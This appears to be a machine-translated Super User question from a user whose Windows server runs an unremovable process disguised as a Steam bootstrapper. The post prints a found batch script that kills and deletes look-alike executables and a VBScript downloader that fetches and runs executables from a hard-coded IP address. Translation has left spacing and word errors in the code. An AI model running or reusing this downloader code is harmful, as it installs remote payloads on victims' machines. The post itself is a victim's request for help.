• Главная
    • /
  • Блог
    • /
  • windows - Steam client bootstrapper - хэрхэн байн байн устгах вэ - Super User

windows - Steam client bootstrapper - хэрхэн байн байн устгах вэ - Super User

Миний ажлын менежерт дараах нөхцөл байдал байна:

Миний ажлын менежерт дараах нөхцөл байдал байна:

Би ямар төрлийн апп гэдгийг мэдэхгүй байна, гэхдээ би үүнийг Steam client bootstrapper биш, учир нь үүнийг суулгаагүй бөгөөд үүнийг бас устгах боломжгүй байна.

Хэрэв би энэ алхамаар ямар төрлийн аппликейшнийг олж мэдэхийг хичээх юм бол:

Би иймэрхүү зүйлийг харж байна:

MS Config хэрэгсэлд би secury.exe шиг харагдах ямар ч зүйл олсонгүй.

Файлын байршлыг нээх үед би гурван файл байгааг харж болно:

m.bat, b.exe, 4.vbs.

M.bat-ийн агуулгыг доор харуулав:

taskkill / f / t / im secury.exe c: \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im nssm.exe taskkill / f / t / im MSASCui.exe taskkill / f / t / im SystemSettlngs.exe taskkill / f / t / im SystemSetting.exe taskkill / f / t / im Process.exe taskkill / f / t / im winlnlt.exe taskkill / f / t / im WindowsUpgrade.exe taskkill / f / t / im msdc.exe taskkill / f / t / im Fiddlere.exe taskkill / f / t / im shovst.exe taskkill / f / t / im lqrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe taskkill / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / im TrustedInstaller.exe del C: \ Windows \ System32 \ soiuos.exe del C: \ Windows \ Setup \ TrustedInstaller.exe del C: \ ProgramData \ kingsoft.exe del C: \ ProgramData \ expl0rer.exe del C: \ ProgramData \ ieplare.exe del C: \ ProgramData \ nssm.exe del C: \ ProgramData \ MSASCui.exe del C: \ Pro gramData \ SystemSettlngs.exe del C: \ ProgramData \ SystemSetting.exe del C: \ ProgramData \ Process.exe del C: \ ProgramData \ winlnlt.exe del C: \ ProgramData \ WindowsUpgrade.exe del C: \ ProgramData \ msdc.exe del C: \ ProgramData \ Fiddlere.exe del C: \ ProgramData \ shovst.exe del C: \ ProgramData \ lqrtqe.exe del C: \ ProgramData \ apkls.exe del C: \ ProgramData \ winlog.exe del C: \ ProgramData \ svchosts.exe del C: \ ProgramData \ win1ogins.exe del C: \ ProgramData \ shovsts.exe del C: \ ProgramData \ fcty.exe del C: \ ProgramData \ pool.exe del C: \ ProgramData \ pool2.exe del C: \ ProgramData \ pool3.exe

Дараа нь 4.vbs:

Set xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ s2.exe", 2 Set xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ pool2.exe", 2 CreateObject ("WScript.Shell") ажиллуулах "C: \ ProgramData \ pool3.exe" CreateObject ( "WScript.Shell") ажиллуулах "del C: \ ProgramData \ pool3.exe"

Серверийнхээ тооцоолох хүчийг буруу ашиглахаас secury.exe зогсоохын тулд би юу хийж чадах вэ?

Жич Би компьютерийнхаа Avast бүрэн хяналтыг гүйцээсэн боловч ямар ч буруу зүйл олоогүй.

Exe зогсоохын тулд би юу хийж чадах вэ?